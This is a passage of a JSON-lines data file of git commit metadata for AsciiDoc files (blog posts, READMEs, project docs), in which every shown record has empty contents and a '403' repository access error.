ithen\/camel,yuruki\/camel,prashant2402\/camel,neoramon\/camel,tdiesler\/camel,hqstevenson\/camel,curso007\/camel","old_file":"camel-core\/src\/main\/docs\/gzip-dataformat.adoc","new_file":"camel-core\/src\/main\/docs\/gzip-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2ffb31528af5271dcbdced7a3623149584bdaf0","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa91811c6d129a394185b01fd490bf9c288ab7f2","subject":"Python: Calculating MD5 digest","message":"Python: Calculating MD5 digest\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"9add78206b5850d7f714f0dd37dcf8535b4b94a0","subject":"Fix blockquote style","message":"Fix blockquote style\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"1c49225e6c1c7c4a8839679aa94cff1ead1c5c83","subject":"Update 2017-04-26-Drift-Focus.adoc","message":"Update 2017-04-26-Drift-Focus.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-26-Drift-Focus.adoc","new_file":"_posts\/2017-04-26-Drift-Focus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf2b801b029e4f2870cf75bf31f07588fb28c13e","subject":"Update 2017-05-31-Java-types.adoc","message":"Update 2017-05-31-Java-types.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Java-types.adoc","new_file":"_posts\/2017-05-31-Java-types.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4a747767874314591ecd6de1acc24cd6ad8b1bc","subject":"README.adoc (works this with github?)","message":"README.adoc (works this with github?)","repos":"BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BrunoEberhard\/minimal-j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"acd6b3769762c5c48d8a6ac9c8e99f3b1b38b24e","subject":"Updated README credit URL","message":"Updated README credit URL\n\nNecessary to pick up new author profile URL.\n","repos":"bkuhlmann\/tokener,bkuhlmann\/tokener,bkuhlmann\/tokener","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/tokener.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d2de1b4bf7bc0e26f1ab6b67fe25fc84f8fd15b9","subject":"README","message":"README\n","repos":"xbib\/content,xbib\/content","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xbib\/content.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b407b696e3c881c95781aca818abf19b09747f0c","subject":"Add link to new JSX demo.","message":"Add link to new JSX demo.\n","repos":"clara-labs\/react-popover,gregory90\/react-popover,littlebits\/react-popover","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/littlebits\/react-popover.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9df3059cf4aab3139ce9b6c85458e4ea31a5a36","subject":"Update README","message":"Update README\n","repos":"pjanouch\/json-rpc-shell,pjanouch\/json-rpc-shell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/json-rpc-shell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"305051da4ace594a8cae6c9db3250b57d547b93a","subject":"Create README.adoc","message":"Create README.adoc","repos":"MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MCPH\/minecrafterph.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d392328e0b2676f0ac5ffb1077cfdcd155d60b3","subject":"Update 2015-07-11-Meet-the-Team-Meg.adoc","message":"Update 2015-07-11-Meet-the-Team-Meg.adoc","repos":"GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io","old_file":"_posts\/2015-07-11-Meet-the-Team-Meg.adoc","new_file":"_posts\/2015-07-11-Meet-the-Team-Meg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GWCATT\/gwcatt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36cad8957992d51a3cf9d667fe67a44a353365ce","subject":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","message":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60313eee2e5e9a375048624b3dcc46af812cf75a","subject":"Some general language fixes","message":"Some general language fixes\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_stateless.asciidoc","new_file":"trex_stateless.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"419c88b12ecc4c87006f48c0a6c1efd23cec6227","subject":"Update 2017-01-16-an-outsiders-perspective-of-UX-research-and-design.adoc","message":"Update 2017-01-16-an-outsiders-perspective-of-UX-research-and-design.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2017-01-16-an-outsiders-perspective-of-UX-research-and-design.adoc","new_file":"_posts\/2017-01-16-an-outsiders-perspective-of-UX-research-and-design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"680457a3d950f0fb24ddd1576ddba821c7bbc672","subject":"job #9198 draft implementation note","message":"job #9198 draft implementation note\n","repos":"xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint","old_file":"doc-bridgepoint\/notes\/9198_unsaved_masl_buffer.int.adoc","new_file":"doc-bridgepoint\/notes\/9198_unsaved_masl_buffer.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6650daf302cbde903093172152547b3058d1c814","subject":"Changes based on feedback","message":"Changes based on feedback\n","repos":"jotak\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/05\/24\/hawkular-btm-ticketmonster-demo.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/05\/24\/hawkular-btm-ticketmonster-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d584290fd479d0780312c03fe9991d0f4d82f5de","subject":"Update and rename README.md to README.asciidoc","message":"Update and rename README.md to README.asciidoc\n\n\ngit-svn-id: 931ef96727c1945c41eec76d1319aea4c3c125f4@11238 6cd15df7-5b2d-4548-a7df-5dcce267a22b\n","repos":"tensorics\/tensorics-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tensorics\/tensorics-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25b22a2cd47a64ad42b8d385b8aa927fb71cf38d","subject":"y2b create post The Invisible iPhone Button...","message":"y2b create post The Invisible iPhone Button...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-27-The%20Invisible%20iPhone%20Button....adoc","new_file":"_posts\/2017-11-27-The%20Invisible%20iPhone%20Button....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb9cc57a61593ad7af6164b9da06a5616b05e28a","subject":"Document blender to jmE via glTF","message":"Document blender to jmE via glTF\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/blender_gltf.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/blender_gltf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"5c3e179aef55392a0cb69035bb05b4878bf81d20","subject":"updates release notes pointers for stateless","message":"updates release notes pointers for stateless\n\nSigned-off-by: imarom <4fa0e965a175bd1cef6459ed7c388bf7ff953a09@cisco.com>\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"13cf40f00b40b41dc6de7d28b6547ccedee4af1b","subject":"Updated README","message":"Updated README\n","repos":"sebhaub\/chronix.spark,sebhaub\/chronix.spark,ChronixDB\/chronix.spark,ChronixDB\/chronix.spark","old_file":"solr-cloud\/README.adoc","new_file":"solr-cloud\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ChronixDB\/chronix.spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"11cfc8d9d114c6d3b242b213bad6183dfa67d409","subject":"Update 2015-09-01-Episode-20-Forum-Questions-Part-2.adoc","message":"Update 2015-09-01-Episode-20-Forum-Questions-Part-2.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-09-01-Episode-20-Forum-Questions-Part-2.adoc","new_file":"_posts\/2015-09-01-Episode-20-Forum-Questions-Part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8af7c2e792d44b0ecde3f51f2ce7f9bce473fc12","subject":"y2b create post Is This The World's Weirdest Mouse?","message":"y2b create post Is This The World's Weirdest Mouse?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-05-Is-This-The-Worlds-Weirdest-Mouse.adoc","new_file":"_posts\/2016-07-05-Is-This-The-Worlds-Weirdest-Mouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0332b33725cb59e471ff46031a028a28cf128cc8","subject":"Update 2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","message":"Update 2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","new_file":"_posts\/2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cbb3e419c3426f4cf287cf8510e82ad838ad7c6","subject":"Update 2016-05-23-Models-are-pointers.adoc","message":"Update 2016-05-23-Models-are-pointers.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ceebcf46b1a8a9a19e15acce844b18769264de4c","subject":"Update 2017-01-23-Test.adoc","message":"Update 2017-01-23-Test.adoc","repos":"OlympusOnline2\/announcements,OlympusOnline2\/announcements,OlympusOnline2\/announcements,OlympusOnline2\/announcements","old_file":"_posts\/2017-01-23-Test.adoc","new_file":"_posts\/2017-01-23-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OlympusOnline2\/announcements.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55610f2ec2098866aada2633270c217a6663f782","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e0db75303618c73b658d3a7c0897b330b585435","subject":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","message":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"143cf77988083d203f1341855c00ccaf07e5e202","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"767c8ac7d21226f5c516b8cb679e5d6a7b0be5db","subject":"y2b create post iPad Air 2 Unboxing","message":"y2b create post iPad Air 2 Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-10-24-iPad-Air-2-Unboxing.adoc","new_file":"_posts\/2014-10-24-iPad-Air-2-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"950e59521a511d41afd838028d76b48937e50fde","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2bde4d873dfc1f85ec165379c9012d29c172e7c","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebb1e9f453c0edfe213e8de3a35bce46b90ad7f6","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d94bb93c4a8700e8c761b38f3befe09bc0596a81","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4d250757d8bf4169da317d5c085d05c34617454","subject":"Fixed for the other image too...","message":"Fixed for the other image too...","repos":"lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,metlos\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,ppalaga\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,ppalaga\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,metlos\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,lzoubek\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dff5c8ca866f2bbd8125398bfb53acbaf4034de7","subject":"Update 2015-07-24-Why-I-do-things.adoc","message":"Update 2015-07-24-Why-I-do-things.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-24-Why-I-do-things.adoc","new_file":"_posts\/2015-07-24-Why-I-do-things.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cadd4ea3a7fc92ecbfe9e8f0fe643182e5ff46b5","subject":"Update 2016-07-24-OSX-cache-clean.adoc","message":"Update 2016-07-24-OSX-cache-clean.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"569bfa907b33edca22b79d66fab9dcc0bd3c4660","subject":"copy from template","message":"copy from template","repos":"tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,tdefilip\/opennms,aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/FtpMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/FtpMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aihua\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"351f9ac082107f68d61db09084729fef6ead5a2e","subject":"Added document in the repo","message":"Added document in the repo\n","repos":"twister2016\/twister,twister2016\/twister,twister2016\/twister,twister2016\/twister","old_file":"documentation\/manual\/TwisterApplicationProgrammersGuide.adoc","new_file":"documentation\/manual\/TwisterApplicationProgrammersGuide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twister2016\/twister.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab158026cec0969eef997f75d3c5592c43f25863","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"caff75abfacf0db89254a603aa14fc3f2ee99b3e","subject":"Update 